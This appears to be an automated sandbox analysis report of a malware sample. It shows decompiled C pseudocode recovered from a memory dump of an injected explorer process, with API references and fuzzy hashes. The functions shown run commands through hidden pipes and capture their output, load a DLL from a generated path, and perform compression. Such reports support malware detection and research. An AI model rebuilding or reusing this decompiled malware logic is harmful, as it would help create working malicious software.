        0x0008d5d6

        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
        • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
        • SysAllocString.OLEAUT32(00000000), ref: 0008D569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 1610782348-0
        • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
        • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
        • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
        • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











        0x000921ff
        0x00092207
        0x0009220c
        0x0009220f
        0x00092214
        0x0009221a
        0x00092223
        0x00092227
        0x00092227
        0x00092223
        0x00092229
        0x0009222e
        0x00092237
        0x0009223c
        0x0009223f
        0x00092248
        0x0009224a
        0x00092251
        0x00092262
        0x00092262
        0x00092264
        0x0009226c
        0x00092273
        0x00000000
        0x0009226e
        0x00092272
        0x00092272
        0x00092253
        0x00092253
        0x00092259
        0x0009225b
        0x00092260
        0x00092276
        0x00092279
        0x0009227e
        0x00000000
        0x00000000
        0x00000000
        0x00092260

        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
        • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
        • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
        • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x133f8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x133f8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0x133fab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}




































        0x0008a9c2
        0x0008a9c4
        0x0008a9d0
        0x0008a9d5
        0x0008a9d8
        0x0008a9da
        0x0008a9dd
        0x0008a9e0
        0x0008a9e7
        0x0008a9ea
        0x0008a9f1
        0x0008a9f4
        0x0008a9fe
        0x0008a9ff
        0x0008aa02
        0x0008aa04
        0x0008aa05
        0x0008aa1c
        0x0008ab9c
        0x00000000
        0x0008ab9c
        0x0008aa33
        0x0008ab68
        0x0008ab6e
        0x0008ab79
        0x0008ab7b
        0x0008ab83
        0x0008ab83
        0x0008ab8a
        0x0008ab8c
        0x0008ab95
        0x0008ab95
        0x00000000
        0x0008ab98
        0x0008aa39
        0x0008aa3c
        0x0008aa3f
        0x0008aa45
        0x0008aa4f
        0x0008aa59
        0x0008aa60
        0x0008aa69
        0x0008aa6b
        0x0008aa71
        0x00000000
        0x00000000
        0x0008aa7c
        0x0008aa83
        0x0008aa84
        0x0008aa89
        0x0008aa8a
        0x0008aa8b
        0x0008aa90
        0x0008aa92
        0x0008aa93
        0x0008aa94
        0x0008aa97
        0x0008aa9d
        0x00000000
        0x00000000
        0x0008aaa3
        0x0008aaab
        0x0008aaae
        0x0008aab6
        0x0008aab9
        0x0008aabc
        0x0008aac2
        0x0008aad6
        0x0008aadc
        0x0008aae2
        0x0008ab0b
        0x0008aae4
        0x0008aae4
        0x0008aae6
        0x0008aae8
        0x0008aaf0
        0x0008aaf8
        0x0008aafd
        0x0008aafd
        0x0008ab11
        0x0008ab13
        0x0008ab13
        0x0008ab1b
        0x0008ab23
        0x0008ab24
        0x0008ab29
        0x0008ab32
        0x0008ab52
        0x0008ab52
        0x0008ab5a
        0x0008ab5d
        0x0008ab65
        0x00000000
        0x0008ab65
        0x0008ab3b
        0x0008ab3f
        0x00000000
        0x00000000
        0x0008ab47
        0x00000000

        APIs
        • memset.MSVCRT ref: 0008A9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
        • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocateFreememset
        • String ID: D
        • API String ID: 2365139273-2746444292
        • Opcode ID: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
        • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
        • Opcode Fuzzy Hash: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
        • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x133fa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}


























        0x0008c4ce
        0x0008c4ce
        0x0008c4ce
        0x0008c4d1
        0x0008c4dd
        0x0008c4e8
        0x0008c504
        0x0008c509
        0x0008c512
        0x0008c514
        0x0008c51c
        0x0008c53d
        0x0008c542
        0x0008c54f
        0x0008c55a
        0x0008c561
        0x0008c568
        0x0008c579
        0x0008c57f
        0x0008c582
        0x0008c599
        0x0008c5a5
        0x0008c5ad
        0x0008c5b4
        0x0008c5ba
        0x0008c5c6
        0x0008c5cc
        0x0008c5d3
        0x0008c5e6
        0x0008c5d5
        0x0008c5d5
        0x0008c5d8
        0x0008c5de
        0x0008c5e3
        0x0008c5e8
        0x0008c5f3
        0x0008c605
        0x0008c617
        0x00000000
        0x0008c619
        0x0008c620
        0x00000000
        0x0008c626
        0x0008c627
        0x0008c627
        0x0008c62e
        0x0008c630
        0x0008c635
        0x0008c635
        0x0008c63a
        0x0008c63e
        0x0008c63e

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
        • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
        • Opcode Fuzzy Hash: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
        • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341COMMON
        Download Yara Rule
        C-Code - Quality: 99%
        			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E00094C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E00094AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































        0x00092d76
        0x00092d7b
        0x00092d7f
        0x00092d82
        0x00092d82
        0x00092d85
        0x00092d8a
        0x00092d8f
        0x00092d92
        0x00092d97
        0x00092d9a
        0x00092da0
        0x00092da0
        0x00092dab
        0x00092dae
        0x00092db5
        0x00092dba
        0x00000000
        0x00000000
        0x00092dc0
        0x00092dc5
        0x00092dc5
        0x00092dca
        0x00092dd0
        0x00092dda
        0x00092ddf
        0x00092de5
        0x00092e04
        0x00092e07
        0x00092e12
        0x00092e12
        0x00092e12
        0x00092e09
        0x00092e09
        0x00092e0b
        0x00000000
        0x00092e0d
        0x00092e0d
        0x00092e0d
        0x00092e0b
        0x00092e1a
        0x00092e1f
        0x00092e24
        0x00092e2a
        0x00092e2e
        0x00092e31
        0x00092e34
        0x00092e3a
        0x00092e3f
        0x00092e42
        0x00092e48
        0x00092e4d
        0x00092e53
        0x00092e59
        0x00092e5e
        0x00092e61
        0x00092e66
        0x00092e6a
        0x00092e6e
        0x00092e71
        0x00092e74
        0x00092e7d
        0x00092e84
        0x00092e87
        0x00092e8a
        0x00092e8f
        0x00092e94
        0x00092e97
        0x00092e9a
        0x00092e9a
        0x00092e9e
        0x00092ea7
        0x00092eae
        0x00092eb1
        0x00092eb6
        0x00092ebb
        0x00092ebb
        0x00092ebe
        0x00092ec3
        0x00000000
        0x00000000
        0x00092de7
        0x00092de9
        0x00092df6
        0x00000000
        0x00000000
        0x00092df6
        0x00092de9
        0x00000000
        0x00092de5
        0x00092ec9
        0x00092ece
        0x00092ed1
        0x00092ed4
        0x00092f7f
        0x00092f7f
        0x00092eda
        0x00092eda
        0x00092eda
        0x00092edf
        0x00092f09
        0x00092f0c
        0x00092f0c
        0x00092f11
        0x00092f13
        0x00092f15
        0x00092f18
        0x00092f1b
        0x00092f23
        0x00092f28
        0x00092f28
        0x00092f2e
        0x00092f31
        0x00092f34
        0x00092f37
        0x00092f39
        0x00092f39
        0x00092f3a
        0x00092f3a
        0x00092f37
        0x00092f48
        0x00092f4b
        0x00092f4f
        0x00092f54
        0x00092f57
        0x00092f5a
        0x00092f5a
        0x00092f5a
        0x00092f5d
        0x00092f5d
        0x00092f60
        0x00092f60
        0x00092ee1
        0x00092ee1
        0x00092ef1
        0x00092ef4
        0x00092ef9
        0x00092ef9
        0x00092efc
        0x00092eff
        0x00092f02
        0x00092f04
        0x00092f04
        0x00092f63
        0x00092f65
        0x00092f68
        0x00092f68
        0x00092f6e
        0x00092f72
        0x00092f75
        0x00092f77
        0x00092f77
        0x00092f88
        0x00092f8a
        0x00092f8a
        0x00092f92
        0x00092fa0
        0x00092fa3
        0x00092fa5
        0x00092fc5
        0x00092fc5
        0x00092fc8
        0x00092fce
        0x00092fcf
        0x00092fd2
        0x00092fd4
        0x00092fd7
        0x00092fda
        0x00092fdd
        0x00092fe1
        0x00092fe4
        0x00092fe7
        0x00092fea
        0x00092fec
        0x00092fec
        0x00092fef
        0x00092ff1
        0x00092ff1
        0x00092ff4
        0x00092ff6
        0x00092ff9
        0x00093001
        0x00093004
